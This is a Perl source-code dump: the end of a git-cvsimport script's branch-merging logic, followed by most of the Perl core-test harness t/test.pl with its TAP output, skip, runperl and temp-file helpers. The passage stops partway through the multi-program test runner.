if (defined $orig_git_index) {
$ENV{GIT_INDEX_FILE} = $orig_git_index;
} else {
delete $ENV{GIT_INDEX_FILE};
}
# Now switch back to the branch we were in before all of this happened
if ($orig_branch) {
print "DONE.\n" if $opt_v;
if ($opt_i) {
exit 0;
}
my $tip_at_end = `git rev-parse --verify HEAD`;
if ($tip_at_start ne $tip_at_end) {
for ($tip_at_start, $tip_at_end) { chomp; }
print "Fetched into the current branch.\n" if $opt_v;
system(qw(git read-tree -u -m),
$tip_at_start, $tip_at_end);
die "Fast-forward update failed: $?\n" if $?;
}
else {
system(qw(git merge cvsimport HEAD), "$remote/$opt_o");
die "Could not merge $opt_o into the current branch.\n" if $?;
}
} else {
$orig_branch = "master";
print "DONE; creating $orig_branch branch\n" if $opt_v;
system("git", "update-ref", "refs/heads/master", "$remote/$opt_o")
unless defined get_headref('refs/heads/master');
system("git", "symbolic-ref", "$remote/HEAD", "$remote/$opt_o")
if ($opt_r && $opt_o ne 'HEAD');
system('git', 'update-ref', 'HEAD', "$orig_branch");
unless ($opt_i) {
system(qw(git checkout -f));
die "checkout failed: $?\n" if $?;
}
}
# ----- v5.24/t/test.pl (from perl11/p5-coretests) -----
#
# t/test.pl - most of Test::More functionality without the fuss
# NOTE:
#
# It's best not to use features found only in more modern Perls here, as some cpan
# distributions copy this file and operate on older Perls. Similarly keep
# things simple as this may be run under fairly broken circumstances. For
# example, increment ($x++) has a certain amount of cleverness for things like
#
# $x = 'zz';
# $x++; # $x eq 'aaa';
#
# This stands more chance of breaking than just a simple
#
# $x = $x + 1
#
# In this file, we use the latter "Baby Perl" approach, and increment
# will be worked over by t/op/inc.t
$Level = 1;
my $test = 1;
my $planned;
my $noplan;
my $Perl; # Safer version of $^X set by which_perl()
# This defines ASCII/UTF-8 vs EBCDIC/UTF-EBCDIC
$::IS_ASCII = ord 'A' == 65;
$::IS_EBCDIC = ord 'A' == 193;
$TODO = 0;
$NO_ENDING = 0;
$Tests_Are_Passing = 1;
# Use this instead of print to avoid interference while testing globals.
sub _print {
local($\, $", $,) = (undef, ' ', '');
print STDOUT @_;
}
sub _print_stderr {
local($\, $", $,) = (undef, ' ', '');
print STDERR @_;
}
sub plan {
my $n;
if (@_ == 1) {
$n = shift;
if ($n eq 'no_plan') {
undef $n;
$noplan = 1;
}
} else {
my %plan = @_;
$plan{skip_all} and skip_all($plan{skip_all});
$n = $plan{tests};
}
_print "1..$n\n" unless $noplan;
$planned = $n;
}
# Set the plan at the end. See Test::More::done_testing.
sub done_testing {
my $n = $test - 1;
$n = shift if @_;
_print "1..$n\n";
$planned = $n;
}
END {
my $ran = $test - 1;
if (!$NO_ENDING) {
if (defined $planned && $planned != $ran) {
_print_stderr
"# Looks like you planned $planned tests but ran $ran.\n";
} elsif ($noplan) {
_print "1..$ran\n";
}
}
}
sub _diag {
return unless @_;
my @mess = _comment(@_);
$TODO ? _print(@mess) : _print_stderr(@mess);
}
# Use this instead of "print STDERR" when outputting failure diagnostic
# messages
sub diag {
_diag(@_);
}
# Use this instead of "print" when outputting informational messages
sub note {
return unless @_;
_print( _comment(@_) );
}
sub is_miniperl {
return !defined &DynaLoader::boot_DynaLoader;
}
sub is_cperl {
return $^V =~ /c$/;
}
sub set_up_inc {
# Don’t clobber @INC under miniperl
#unshift @INC, () unless is_miniperl;
unshift @INC, @_;
}
sub _comment {
return map { /^#/ ? "$_\n" : "# $_\n" }
map { split /\n/ } @_;
}
sub _have_dynamic_extension {
my $extension = shift;
unless (eval {require Config; 1}) {
warn "test.pl had problems loading Config: $@";
return 1;
}
$extension =~ s!::!/!g;
return 1 if ($Config::Config{extensions} =~ /\b$extension\b/);
}
sub skip_all {
if (@_) {
_print "1..0 # Skip @_\n";
} else {
_print "1..0\n";
}
exit(0);
}
sub skip_all_if_miniperl {
skip_all(@_) if is_miniperl();
}
sub skip_all_without_dynamic_extension {
my ($extension) = @_;
skip_all("no dynamic loading on miniperl, no $extension") if is_miniperl();
return if &_have_dynamic_extension;
skip_all("$extension was not built");
}
sub skip_all_without_perlio {
skip_all('no PerlIO') unless PerlIO::Layer->find('perlio');
}
sub skip_all_without_config {
unless (eval {require Config; 1}) {
warn "test.pl had problems loading Config: $@";
return;
}
foreach (@_) {
next if $Config::Config{$_};
my $key = $_; # Need to copy, before trying to modify.
$key =~ s/^use//;
$key =~ s/^d_//;
skip_all("no $key");
}
}
sub skip_all_without_unicode_tables { # (but only under miniperl)
if (is_miniperl()) {
skip_all_if_miniperl("Unicode tables not built yet")
unless eval 'require "unicore/Heavy.pl"';
}
}
sub find_git_or_skip {
my ($source_dir, $reason);
if (-d '.git') {
$source_dir = '.';
} elsif (-l 'MANIFEST' && -l 'AUTHORS') {
my $where = readlink 'MANIFEST';
die "Can't readling MANIFEST: $!" unless defined $where;
die "Confusing symlink target for MANIFEST, '$where'"
unless $where =~ s!/MANIFEST\z!!;
if (-d "$where/.git") {
# Looks like we are in a symlink tree
if (exists $ENV{GIT_DIR}) {
diag("Found source tree at $where, but \$ENV{GIT_DIR} is $ENV{GIT_DIR}. Not changing it");
} else {
note("Found source tree at $where, setting \$ENV{GIT_DIR}");
$ENV{GIT_DIR} = "$where/.git";
}
$source_dir = $where;
}
} elsif (exists $ENV{GIT_DIR}) {
my $commit = '8d063cd8450e59ea1c611a2f4f5a21059a2804f1';
my $out = `git rev-parse --verify --quiet '$commit^{commit}'`;
chomp $out;
if($out eq $commit) {
$source_dir = '.'
}
}
if ($source_dir) {
my $version_string = `git --version`;
if (defined $version_string
&& $version_string =~ /\Agit version (\d+\.\d+\.\d+)(.*)/) {
return $source_dir if eval "v$1 ge v1.5.0";
# If you have earlier than 1.5.0 and it works, change this test
$reason = "in git checkout, but git version '$1$2' too old";
} else {
$reason = "in git checkout, but cannot run git";
}
} else {
$reason = 'not being run from a git checkout';
}
skip_all($reason) if $_[0] && $_[0] eq 'all';
skip($reason, @_);
}
sub BAIL_OUT {
my ($reason) = @_;
_print("Bail out! $reason\n");
exit 255;
}
sub _ok {
my ($pass, $where, $name, @mess) = @_;
# Do not try to microoptimize by factoring out the "not ".
# VMS will avenge.
my $out;
if ($name) {
# escape out '#' or it will interfere with '# skip' and such
$name =~ s/#/\\#/g;
$out = $pass ? "ok $test - $name" : "not ok $test - $name";
} else {
$out = $pass ? "ok $test" : "not ok $test";
}
if ($TODO) {
$out = $out . " # TODO $TODO";
} else {
$Tests_Are_Passing = 0 unless $pass;
}
_print "$out\n";
if ($pass) {
note @mess; # Ensure that the message is properly escaped.
}
else {
my $msg = "# Failed test $test - ";
$msg.= "$name " if $name;
$msg .= "$where\n";
_diag $msg;
_diag @mess;
}
$test = $test + 1; # don't use ++
return $pass;
}
sub _where {
my @caller = caller($Level);
return "at $caller[1] line $caller[2]";
}
# DON'T use this for matches. Use like() instead.
sub ok ($@) {
my ($pass, $name, @mess) = @_;
_ok($pass, _where(), $name, @mess);
}
sub _q {
my $x = shift;
return 'undef' unless defined $x;
my $q = $x;
$q =~ s/\\/\\\\/g;
$q =~ s/'/\\'/g;
return "'$q'";
}
sub _qq {
my $x = shift;
return defined $x ? '"' . display ($x) . '"' : 'undef';
};
# keys are the codes \n etc map to, values are 2 char strings such as \n
my %backslash_escape;
foreach my $x (split //, 'nrtfa\\\'"') {
$backslash_escape{ord eval "\"\\$x\""} = "\\$x";
}
# A way to display scalars containing control characters and Unicode.
# Trying to avoid setting $_, or relying on local $_ to work.
sub display {
my @result;
foreach my $x (@_) {
if (defined $x and not ref $x) {
my $y = '';
foreach my $c (unpack("W*", $x)) {
if ($c > 255) {
$y = $y . sprintf "\\x{%x}", $c;
} elsif ($backslash_escape{$c}) {
$y = $y . $backslash_escape{$c};
} else {
my $z = chr $c; # Maybe we can get away with a literal...
if ($z !~ /[^[:^print:][:^ascii:]]/) {
# The pattern above is equivalent (by de Morgan's
# laws) to:
# $z !~ /(?[ [:print:] & [:ascii:] ])/
# or, $z is not an ascii printable character
# Use octal for characters with small ordinals that
# are traditionally expressed as octal: the controls
# below space, which on EBCDIC are almost all the
# controls, but on ASCII don't include DEL nor the C1
# controls.
if ($c < ord " ") {
$z = sprintf "\\%03o", $c;
} else {
$z = sprintf "\\x{%x}", $c;
}
}
$y = $y . $z;
}
}
$x = $y;
}
return $x unless wantarray;
push @result, $x;
}
return @result;
}
sub is ($$@) {
my ($got, $expected, $name, @mess) = @_;
my $pass;
if( !defined $got || !defined $expected ) {
# undef only matches undef
$pass = !defined $got && !defined $expected;
}
else {
$pass = $got eq $expected;
}
unless ($pass) {
unshift(@mess, "# got "._qq($got)."\n",
"# expected "._qq($expected)."\n");
}
_ok($pass, _where(), $name, @mess);
}
sub isnt ($$@) {
my ($got, $isnt, $name, @mess) = @_;
my $pass;
if( !defined $got || !defined $isnt ) {
# undef only matches undef
$pass = defined $got || defined $isnt;
}
else {
$pass = $got ne $isnt;
}
unless( $pass ) {
unshift(@mess, "# it should not be "._qq($got)."\n",
"# but it is.\n");
}
_ok($pass, _where(), $name, @mess);
}
sub cmp_ok ($$$@) {
my($got, $type, $expected, $name, @mess) = @_;
my $pass;
{
local $^W = 0;
local($@,$!); # don't interfere with $@
# eval() sometimes resets $!
$pass = eval "\$got $type \$expected";
}
unless ($pass) {
# It seems Irix long doubles can have 2147483648 and 2147483648
# that stringify to the same thing but are actually numerically
# different. Display the numbers if $type isn't a string operator,
# and the numbers are stringwise the same.
# (all string operators have alphabetic names, so tr/a-z// is true)
# This will also show numbers for some unneeded cases, but will
# definitely be helpful for things such as == and <= that fail
if ($got eq $expected and $type !~ tr/a-z//) {
unshift @mess, "# $got - $expected = " . ($got - $expected) . "\n";
}
unshift(@mess, "# got "._qq($got)."\n",
"# expected $type "._qq($expected)."\n");
}
_ok($pass, _where(), $name, @mess);
}
# Check that $got is within $range of $expected
# if $range is 0, then check it's exact
# else if $expected is 0, then $range is an absolute value
# otherwise $range is a fractional error.
# Here $range must be numeric, >= 0
# Non numeric ranges might be a useful future extension. (eg %)
sub within ($$$@) {
my ($got, $expected, $range, $name, @mess) = @_;
my $pass;
if (!defined $got or !defined $expected or !defined $range) {
# This is a fail, but doesn't need extra diagnostics
} elsif ($got !~ tr/0-9// or $expected !~ tr/0-9// or $range !~ tr/0-9//) {
# This is a fail
unshift @mess, "# got, expected and range must be numeric\n";
} elsif ($range < 0) {
# This is also a fail
unshift @mess, "# range must not be negative\n";
} elsif ($range == 0) {
# Within 0 is ==
$pass = $got == $expected;
} elsif ($expected == 0) {
# If expected is 0, treat range as absolute
$pass = ($got <= $range) && ($got >= - $range);
} else {
my $diff = $got - $expected;
$pass = abs ($diff / $expected) < $range;
}
unless ($pass) {
if ($got eq $expected) {
unshift @mess, "# $got - $expected = " . ($got - $expected) . "\n";
}
unshift@mess, "# got "._qq($got)."\n",
"# expected "._qq($expected)." (within "._qq($range).")\n";
}
_ok($pass, _where(), $name, @mess);
}
# Note: this isn't quite as fancy as Test::More::like().
sub like ($$@) { like_yn (0,@_) }; # 0 for -
sub unlike ($$@) { like_yn (1,@_) }; # 1 for un-
sub like_yn ($$$@) {
my ($flip, undef, $expected, $name, @mess) = @_;
# We just accept like(..., qr/.../), not like(..., '...'), and
# definitely not like(..., '/.../') like
# Test::Builder::maybe_regex() does.
unless (re::is_regexp($expected)) {
die "PANIC: The value '$expected' isn't a regexp. The like() function needs a qr// pattern, not a string";
}
my $pass;
$pass = $_[1] =~ /$expected/ if !$flip;
$pass = $_[1] !~ /$expected/ if $flip;
my $display_got = $_[1];
$display_got = display($display_got);
my $display_expected = $expected;
$display_expected = display($display_expected);
unless ($pass) {
unshift(@mess, "# got '$display_got'\n",
$flip
? "# expected !~ /$display_expected/\n"
: "# expected /$display_expected/\n");
}
local $Level = $Level + 1;
_ok($pass, _where(), $name, @mess);
}
sub pass {
_ok(1, '', @_);
}
sub fail {
_ok(0, _where(), @_);
}
sub curr_test {
$test = shift if @_;
return $test;
}
sub next_test {
my $retval = $test;
$test = $test + 1; # don't use ++
$retval;
}
# Note: can't pass multipart messages since we try to
# be compatible with Test::More::skip().
sub skip {
my $why = shift;
my $n = @_ ? shift : 1;
my $bad_swap;
my $both_zero;
{
local $^W = 0;
$bad_swap = $why > 0 && $n == 0;
$both_zero = $why == 0 && $n == 0;
}
if ($bad_swap || $both_zero || @_) {
my $arg = "'$why', '$n'";
if (@_) {
$arg .= join(", ", '', map { qq['$_'] } @_);
}
die qq[$0: expected skip(why, count), got skip($arg)\n];
}
for (1..$n) {
_print "ok $test # skip $why\n";
$test = $test + 1;
}
local $^W = 0;
last SKIP;
}
sub skip_if_miniperl {
skip(@_) if is_miniperl();
}
sub skip_without_dynamic_extension {
my $extension = shift;
skip("no dynamic loading on miniperl, no extension $extension", @_)
if is_miniperl();
return if &_have_dynamic_extension($extension);
skip("extension $extension was not built", @_);
}
sub todo_skip {
my $why = shift;
my $n = @_ ? shift : 1;
for (1..$n) {
_print "not ok $test # TODO & SKIP $why\n";
$test = $test + 1;
}
local $^W = 0;
last TODO;
}
sub eq_array {
my ($ra, $rb) = @_;
return 0 unless $#$ra == $#$rb;
for my $i (0..$#$ra) {
next if !defined $ra->[$i] && !defined $rb->[$i];
return 0 if !defined $ra->[$i];
return 0 if !defined $rb->[$i];
return 0 unless $ra->[$i] eq $rb->[$i];
}
return 1;
}
sub eq_hash {
my ($orig, $suspect) = @_;
my $fail;
while (my ($key, $value) = each %$suspect) {
# Force a hash recompute if this perl's internals can cache the hash key.
$key = "" . $key;
if (exists $orig->{$key}) {
if (
defined $orig->{$key} != defined $value
|| (defined $value && $orig->{$key} ne $value)
) {
_print "# key ", _qq($key), " was ", _qq($orig->{$key}),
" now ", _qq($value), "\n";
$fail = 1;
}
} else {
_print "# key ", _qq($key), " is ", _qq($value),
", not in original.\n";
$fail = 1;
}
}
foreach (keys %$orig) {
# Force a hash recompute if this perl's internals can cache the hash key.
$_ = "" . $_;
next if (exists $suspect->{$_});
_print "# key ", _qq($_), " was ", _qq($orig->{$_}), " now missing.\n";
$fail = 1;
}
!$fail;
}
# We only provide a subset of the Test::More functionality.
sub require_ok ($) {
my ($require) = @_;
if ($require =~ tr/[A-Za-z0-9:.]//c) {
fail("Invalid character in \"$require\", passed to require_ok");
} else {
eval <<REQUIRE_OK;
require $require;
REQUIRE_OK
is($@, '', _where(), "require $require");
}
}
sub use_ok ($) {
my ($use) = @_;
if ($use =~ tr/[A-Za-z0-9:.]//c) {
fail("Invalid character in \"$use\", passed to use");
} else {
eval <<USE_OK;
use $use;
USE_OK
is($@, '', _where(), "use $use");
}
}
# runperl - Runs a separate perl interpreter and returns its output.
# Arguments :
# switches => [ command-line switches ]
# nolib => 1 # don't use -I../lib (included by default)
# non_portable => Don't warn if a one liner contains quotes
# prog => one-liner (avoid quotes)
# progs => [ multi-liner (avoid quotes) ]
# progfile => perl script
# stdin => string to feed the stdin (or undef to redirect from /dev/null)
# stderr => If 'devnull' suppresses stderr, if other TRUE value redirect
# stderr to stdout
# args => [ command-line arguments to the perl program ]
# verbose => print the command line
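#
# A typical (hypothetical) call looks like:
#
#   my $out = runperl(prog => 'print qq(hi)', stderr => 1);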
my $is_mswin = $^O eq 'MSWin32';
my $is_netware = $^O eq 'NetWare';
my $is_vms = $^O eq 'VMS';
my $is_cygwin = $^O eq 'cygwin';
sub _quote_args {
my ($runperl, $args) = @_;
foreach (@$args) {
# In VMS protect with doublequotes because otherwise
# DCL will lowercase -- unless already doublequoted.
$_ = q(").$_.q(") if $is_vms && !/^\"/ && length($_) > 0;
$runperl = $runperl . ' ' . $_;
}
return $runperl;
}
sub _create_runperl { # Create the string to qx in runperl().
my %args = @_;
my $runperl = which_perl();
if ($runperl =~ m/\s/) {
$runperl = qq{"$runperl"};
}
#- this allows, for example, to set PERL_RUNPERL_DEBUG=/usr/bin/valgrind
if ($ENV{PERL_RUNPERL_DEBUG}) {
$runperl = "$ENV{PERL_RUNPERL_DEBUG} $runperl";
}
unless ($args{nolib}) {
$runperl = $runperl . ' "-I../lib"'; # doublequotes because of VMS
}
if ($args{switches}) {
local $Level = 2;
die "test.pl:runperl(): 'switches' must be an ARRAYREF " . _where()
unless ref $args{switches} eq "ARRAY";
$runperl = _quote_args($runperl, $args{switches});
}
if (defined $args{prog}) {
die "test.pl:runperl(): both 'prog' and 'progs' cannot be used " . _where()
if defined $args{progs};
$args{progs} = [split /\n/, $args{prog}, -1]
}
if (defined $args{progs}) {
die "test.pl:runperl(): 'progs' must be an ARRAYREF " . _where()
unless ref $args{progs} eq "ARRAY";
foreach my $prog (@{$args{progs}}) {
if (!$args{non_portable}) {
if ($prog =~ tr/'"//) {
warn "quotes in prog >>$prog<< are not portable";
}
if ($prog =~ /^([<>|]|2>)/) {
warn "Initial $1 in prog >>$prog<< is not portable";
}
if ($prog =~ /&\z/) {
warn "Trailing & in prog >>$prog<< is not portable";
}
}
if ($is_mswin || $is_netware || $is_vms) {
$runperl = $runperl . qq ( -e "$prog" );
}
else {
$runperl = $runperl . qq ( -e '$prog' );
}
}
} elsif (defined $args{progfile}) {
$runperl = $runperl . qq( "$args{progfile}");
} else {
# You probably didn't want to be sucking in from the upstream stdin
die "test.pl:runperl(): none of prog, progs, progfile, args, "
. " switches or stdin specified"
unless defined $args{args} or defined $args{switches}
or defined $args{stdin};
}
if (defined $args{stdin}) {
# so we don't try to put literal newlines and crs onto the
# command line.
$args{stdin} =~ s/\n/\\n/g;
$args{stdin} =~ s/\r/\\r/g;
if ($is_mswin || $is_netware || $is_vms) {
$runperl = qq{$Perl -e "print qq(} .
$args{stdin} . q{)" | } . $runperl;
}
else {
$runperl = qq{$Perl -e 'print qq(} .
$args{stdin} . q{)' | } . $runperl;
}
} elsif (exists $args{stdin}) {
# Using the pipe construction above can cause fun on systems which use
# ksh as /bin/sh, as ksh does pipes differently (with one less process)
# With sh, for the command line 'perl -e 'print qq()' | perl -e ...'
# the sh process forks two children, which use exec to start the two
# perl processes. The parent shell process persists for the duration of
# the pipeline, and the second perl process starts with no children.
# With ksh (and zsh), the shell saves a process by forking a child for
# just the first perl process, and execing itself to start the second.
# This means that the second perl process starts with one child which
	# it didn't create. This causes "fun" when the tests assume that
# wait (or waitpid) will only return information about processes
# started within the test.
# They also cause fun on VMS, where the pipe implementation returns
# the exit code of the process at the front of the pipeline, not the
# end. This messes up any test using OPTION FATAL.
# Hence it's useful to have a way to make STDIN be at eof without
# needing a pipeline, so that the fork tests have a sane environment
# without these surprises.
# /dev/null appears to be surprisingly portable.
$runperl = $runperl . ($is_mswin ? ' <nul' : ' </dev/null');
}
if (defined $args{args}) {
$runperl = _quote_args($runperl, $args{args});
}
if (exists $args{stderr} && $args{stderr} eq 'devnull') {
$runperl = $runperl . ($is_mswin ? ' 2>nul' : ' 2>/dev/null');
}
elsif ($args{stderr}) {
$runperl = $runperl . ' 2>&1';
}
if ($args{verbose}) {
my $runperldisplay = $runperl;
$runperldisplay =~ s/\n/\n\#/g;
_print_stderr "# $runperldisplay\n";
}
return $runperl;
}
# sub run_perl {} is alias to below
sub runperl {
die "test.pl:runperl() does not take a hashref"
if ref $_[0] and ref $_[0] eq 'HASH';
my $runperl = &_create_runperl;
my $result;
my $tainted = ${^TAINT};
my %args = @_;
exists $args{switches} && grep m/^-T$/, @{$args{switches}} and $tainted = $tainted + 1;
if ($tainted) {
# We will assume that if you're running under -T, you really mean to
# run a fresh perl, so we'll brute force launder everything for you
my $sep;
if (! eval {require Config; 1}) {
warn "test.pl had problems loading Config: $@";
$sep = ':';
} else {
$sep = $Config::Config{path_sep};
}
my @keys = grep {exists $ENV{$_}} qw(CDPATH IFS ENV BASH_ENV);
local @ENV{@keys} = ();
# Untaint, plus take out . and empty string:
local $ENV{'DCL$PATH'} = $1 if $is_vms && exists($ENV{'DCL$PATH'}) && ($ENV{'DCL$PATH'} =~ /(.*)/s);
$ENV{PATH} =~ /(.*)/s;
local $ENV{PATH} =
join $sep, grep { $_ ne "" and $_ ne "." and -d $_ and
($is_mswin or $is_vms or !(stat && (stat _)[2]&0022)) }
split quotemeta ($sep), $1;
if ($is_cygwin) { # Must have /bin under Cygwin
if (length $ENV{PATH}) {
$ENV{PATH} = $ENV{PATH} . $sep;
}
$ENV{PATH} = $ENV{PATH} . '/bin';
}
$runperl =~ /(.*)/s;
$runperl = $1;
$result = `$runperl`;
} else {
$result = `$runperl`;
}
$result =~ s/\n\n/\n/g if $is_vms; # XXX pipes sometimes double these
return $result;
}
# Nice alias
*run_perl = *run_perl = \&runperl; # shut up "used only once" warning
sub DIE {
_print_stderr "# @_\n";
exit 1;
}
# A somewhat safer version of the sometimes wrong $^X.
sub which_perl {
unless (defined $Perl) {
$Perl = $^X;
# VMS should have 'perl' aliased properly
return $Perl if $is_vms;
my $exe;
if (! eval {require Config; 1}) {
warn "test.pl had problems loading Config: $@";
$exe = '';
} else {
$exe = $Config::Config{_exe};
}
$exe = '' unless defined $exe;
# This doesn't absolutize the path: beware of future chdirs().
# We could do File::Spec->abs2rel() but that does getcwd()s,
# which is a bit heavyweight to do here.
if ($Perl =~ /^perl\Q$exe\E$/i) {
my $perl = "perl$exe";
if (! eval {require File::Spec; 1}) {
warn "test.pl had problems loading File::Spec: $@";
$Perl = "./$perl";
} else {
$Perl = File::Spec->catfile(File::Spec->curdir(), $perl);
}
}
# Build up the name of the executable file from the name of
# the command.
if ($Perl !~ /\Q$exe\E$/i) {
$Perl = $Perl . $exe;
}
warn "which_perl: cannot find $Perl from $^X" unless -f $Perl;
# For subcommands to use.
$ENV{PERLEXE} = $Perl;
}
return $Perl;
}
sub unlink_all {
my $count = 0;
foreach my $file (@_) {
1 while unlink $file;
if( -f $file ){
_print_stderr "# Couldn't unlink '$file': $!\n";
}else{
++$count;
}
}
$count;
}
# _num_to_alpha - Returns a string of letters representing a positive integer.
# Arguments :
# number to convert
# maximum number of letters
# returns undef if the number is negative
# returns undef if the number of letters is greater than the maximum wanted
# _num_to_alpha( 0) eq 'A';
# _num_to_alpha( 1) eq 'B';
# _num_to_alpha(25) eq 'Z';
# _num_to_alpha(26) eq 'AA';
# _num_to_alpha(27) eq 'AB';
my @letters = qw(A B C D E F G H I J K L M N O P Q R S T U V W X Y Z);
# Avoid ++ -- ranges split negative numbers
sub _num_to_alpha{
my($num,$max_char) = @_;
return unless $num >= 0;
my $alpha = '';
my $char_count = 0;
$max_char = 0 if $max_char < 0;
while( 1 ){
$alpha = $letters[ $num % 26 ] . $alpha;
$num = int( $num / 26 );
last if $num == 0;
$num = $num - 1;
# char limit
next unless $max_char;
$char_count = $char_count + 1;
return if $char_count == $max_char;
}
return $alpha;
}
my %tmpfiles;
END { unlink_all keys %tmpfiles }
# A regexp that matches the tempfile names
$::tempfile_regexp = 'tmp\d+[A-Z][A-Z]?';
# Avoid ++, avoid ranges, avoid split //
my $tempfile_count = 0;
sub tempfile {
while(1){
my $try = "tmp$$";
my $alpha = _num_to_alpha($tempfile_count,2);
last unless defined $alpha;
$try = $try . $alpha;
$tempfile_count = $tempfile_count + 1;
# Need to note all the file names we allocated, as a second request may
# come before the first is created.
if (!$tmpfiles{$try} && !-e $try) {
# We have a winner
$tmpfiles{$try} = 1;
return $try;
}
}
die "Can't find temporary file name starting \"tmp$$\"";
}
# register_tempfile - Adds a list of files to be removed at the end of the current test file
# Arguments :
# a list of files to be removed later
# returns a count of how many file names were actually added
# Reuses %tmpfiles so that tempfile() will also skip any files added here
# even if the file doesn't exist yet.
sub register_tempfile {
my $count = 0;
for( @_ ){
if( $tmpfiles{$_} ){
_print_stderr "# Temporary file '$_' already added\n";
}else{
$tmpfiles{$_} = 1;
$count = $count + 1;
}
}
return $count;
}
# This is the temporary file for _fresh_perl
my $tmpfile = tempfile();
sub _fresh_perl {
my($prog, $action, $expect, $runperl_args, $name) = @_;
# Given the choice of the mis-parsable {}
# (we want an anon hash, but a borked lexer might think that it's a block)
# or relying on taking a reference to a lexical
# (\ might be mis-parsed, and the reference counting on the pad may go
# awry)
# it feels like the least-worse thing is to assume that auto-vivification
# works. At least, this is only going to be a run-time failure, so won't
# affect tests using this file but not this function.
$runperl_args->{progfile} ||= $tmpfile;
$runperl_args->{stderr} = 1 unless exists $runperl_args->{stderr};
open TEST, ">$tmpfile" or die "Cannot open $tmpfile: $!";
print TEST $prog;
close TEST or die "Cannot close $tmpfile: $!";
my $results = runperl(%$runperl_args);
my $status = $?;
# Clean up the results into something a bit more predictable.
$results =~ s/\n+$//;
$results =~ s/at\s+$::tempfile_regexp\s+line/at - line/g;
$results =~ s/of\s+$::tempfile_regexp\s+aborted/of - aborted/g;
# bison says 'parse error' instead of 'syntax error',
# various yaccs may or may not capitalize 'syntax'.
$results =~ s/^(syntax|parse) error/syntax error/mig;
if ($is_vms) {
# some tests will trigger VMS messages that won't be expected
$results =~ s/\n?%[A-Z]+-[SIWEF]-[A-Z]+,.*//;
# pipes double these sometimes
$results =~ s/\n\n/\n/g;
}
# Use the first line of the program as a name if none was given
unless( $name ) {
($first_line, $name) = $prog =~ /^((.{1,50}).*)/;
$name = $name . '...' if length $first_line > length $name;
}
# Historically this was implemented using a closure, but then that means
# that the tests for closures avoid using this code. Given that there
# are exactly two callers, doing exactly two things, the simpler approach
# feels like a better trade off.
my $pass;
if ($action eq 'eq') {
$pass = is($results, $expect, $name);
} elsif ($action eq '=~') {
$pass = like($results, $expect, $name);
} else {
die "_fresh_perl can't process action '$action'";
}
unless ($pass) {
_diag "# PROG: \n$prog\n";
_diag "# STATUS: $status\n";
}
return $pass;
}
#
# fresh_perl_is
#
# Combination of run_perl() and is().
#
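# A typical (hypothetical) call looks like:
#
#   fresh_perl_is('print "hello"', "hello", {}, 'prints hello in a fresh perl');
#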
sub fresh_perl_is {
my($prog, $expected, $runperl_args, $name) = @_;
# _fresh_perl() is going to clip the trailing newlines off the result.
# This will make it so the test author doesn't have to know that.
$expected =~ s/\n+$//;
local $Level = 2;
_fresh_perl($prog, 'eq', $expected, $runperl_args, $name);
}
#
# fresh_perl_like
#
# Combination of run_perl() and like().
#
sub fresh_perl_like {
my($prog, $expected, $runperl_args, $name) = @_;
local $Level = 2;
_fresh_perl($prog, '=~', $expected, $runperl_args, $name);
}
# Many tests use the same format in __DATA__ or external files to specify a
# sequence of (fresh) tests to run, extra files they may temporarily need, and
# what the expected output is. Putting it here allows common code to serve
# these multiple tests.
#
# Each program is source code to run followed by an "EXPECT" line, followed
# by the expected output.
#
# The code to run may begin with a command line switch such as -w or -0777
# (alphanumerics only), and may contain (note the '# ' on each):
# # TODO reason for todo
# # SKIP reason for skip
# # SKIP ?code to test if this should be skipped
# # NAME name of the test (as with ok($ok, $name))
#
# The expected output may contain:
# OPTION list of options
# OPTIONS list of options
#
# The possible options for OPTION may be:
# regex - the expected output is a regular expression
# random - all lines match but in any order
# fatal - the code will fail fatally (croak, die)
#
# If the actual output contains a line "SKIPPED" the test will be
# skipped.
#
# If the actual output contains a line "PREFIX", any output starting with that
# line will be ignored when comparing with the expected output
#
# If the global variable $FATAL is true then OPTION fatal is the
# default.
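# An illustrative (hypothetical) entry in that format looks like:
#   ########
#   # NAME warn reports the caller's line
#   warn "boom";
#   EXPECT
#   boom at - line 1.
#   ########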
sub _setup_one_file {
my $fh = shift;
# Store the filename as a program that started at line 0.
# Real files count lines starting at line 1.
my @these = (0, shift);
my ($lineno, $current);
while (<$fh>) {
if ($_ eq "########\n") {
if (defined $current) {
push @these, $lineno, $current;
}
undef $current;
} else {
if (!defined $current) {
$lineno = $.;
}
$current .= $_;
}
}
if (defined $current) {
push @these, $lineno, $current;
}
((scalar @these) / 2 - 1, @these);
}
sub setup_multiple_progs {
my ($tests, @prgs);
foreach my $file (@_) {
next if $file =~ /(?:~|\.orig|,v)$/;
next if $file =~ /perlio$/ && !PerlIO::Layer->find('perlio');
next if -d $file;
open my $fh, '<', $file or die "Cannot open $file: $!\n" ;
my $found;
while (<$fh>) {
if (/^__END__/) {
++$found;
last;
}
}
# This is an internal error, and should never happen. All bar one of
# the files had an __END__ marker to signal the end of their preamble,
# although for some it wasn't technically necessary as they have no
# tests. It might be possible to process files without an __END__ by
# seeking back to the start and treating the whole file as tests, but
# it's simpler and more reliable just to make the rule that all files
# must have __END__ in. This should never fail - a file without an
# __END__ should not have been checked in, because the regression tests
# would not have passed.
die "Could not find '__END__' in $file"
unless $found;
my ($t, @p) = _setup_one_file($fh, $file);
$tests += $t;
push @prgs, @p;
close $fh
or die "Cannot close $file: $!\n";
}
return ($tests, @prgs);
}
sub run_multiple_progs {
my $up = shift;
my @prgs;
if ($up) {
# The tests in lib run in a temporary subdirectory of t, and always
# pass in a list of "programs" to run
@prgs = @_;
} else {
# The tests below t run in t and pass in a file handle. In theory we
# can pass (caller)[1] as the second argument to report errors with
# the filename of our caller, as the handle is always DATA. However,
# line numbers in DATA count from the __END__ token, so will be wrong.
# Which is more confusing than not providing line numbers. So, for now,
# don't provide line numbers. No obvious clean solution - one hack
# would be to seek DATA back to the start and read to the __END__ token,
# but that feels almost like we should just open $0 instead.
# Not going to rely on undef in list assignment.
my $dummy;
($dummy, @prgs) = _setup_one_file(shift);
}
my $tmpfile = tempfile();
my ($file, $line);
PROGRAM:
while (defined ($line = shift @prgs)) {
$_ = shift @prgs;
unless ($line) {
$file = $_;
if (defined $file) {
print "# From $file\n";
}
next;
}
my $switch = "";
my @temps ;
my @temp_path;
if (s/^(\s*-\w+)//) {
$switch = $1;
}
my ($prog, $expected) = split(/\nEXPECT(?:\n|$)/, $_, 2);
my %reason;
foreach my $what (qw(skip todo)) {
$prog =~ s/^#\s*\U$what\E\s*(.*)\n//m and $reason{$what} = $1;
# If the SKIP reason starts ? then it's taken as a code snippet to
# evaluate. This provides the flexibility to have conditional SKIPs
